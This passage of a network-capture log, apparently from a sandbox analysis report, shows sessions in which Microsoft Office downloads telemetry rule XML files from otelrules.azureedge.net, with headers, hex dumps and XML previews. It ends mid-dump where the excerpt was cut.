                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:25 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1368
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                          ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                          x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180225Z-178bfbc474bmqmgjhC1NYCy16c00000004xg00000000682t
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:26 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          140192.168.2.54994313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:25 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:26 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:25 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1378
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                          ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                          x-ms-request-id: f92a0347-601e-005c-7f58-3cf06f000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180225Z-15b8b599d88pxmdghC1TEBux9c00000003ag00000000ft7s
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:26 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          141192.168.2.54994213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:25 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:26 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1415
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                          ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                          x-ms-request-id: d606dcfe-601e-003e-695e-3b3248000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180226Z-178bfbc474bpscmfhC1NYCfc2c00000003bg00000000ebxx
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:26 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          142192.168.2.54994813.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:27 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:28 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1407
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                          ETag: "0x8DC582BE687B46A"
                                                                                                                                                                          x-ms-request-id: 6b6acbbe-a01e-0021-3306-3d814c000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180228Z-178bfbc474bq2pr7hC1NYCkfgg000000051g000000001z2x
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:28 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          143192.168.2.54994613.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:27 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1415
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                          ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                          x-ms-request-id: afa98cfc-701e-003e-2a3c-3c79b3000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180228Z-178bfbc474bvjk8shC1NYC83ns00000004ng00000000azs2
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:28 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          144192.168.2.54994713.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:27 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1378
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                          ETag: "0x8DC582BE584C214"
                                                                                                                                                                          x-ms-request-id: 8c2dcc7a-801e-0035-158c-3b752a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180228Z-174c587ffdfmlsmvhC1TEBvyks00000003eg000000009buk
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:28 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          145192.168.2.54994913.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:27 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1370
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                          ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                          x-ms-request-id: 24867866-a01e-0053-1264-3b8603000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180228Z-178bfbc474bfw4gbhC1NYCunf400000004vg000000006rty
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:28 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          146192.168.2.54995013.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:28 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:28 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1397
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                          ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                          x-ms-request-id: 8149a5d6-a01e-001e-117b-3b49ef000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180228Z-174c587ffdfcj798hC1TEB9bq400000003eg00000000ah8e
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:28 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          147192.168.2.54995313.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:30 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:30 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1369
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                          ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                          x-ms-request-id: e9975653-d01e-0065-2d8c-3ab77a000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180230Z-178bfbc474bp8mkvhC1NYCzqnn00000004p0000000009pxt
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:30 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          148192.168.2.54995213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:02:30 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:02:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:02:30 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 1406
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                          ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                          x-ms-request-id: 1b4bb325-601e-00ab-374a-3d66f4000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180230Z-15b8b599d88phfhnhC1TEBr51n00000003a000000000h6sz
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-11-23 18:02:30 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
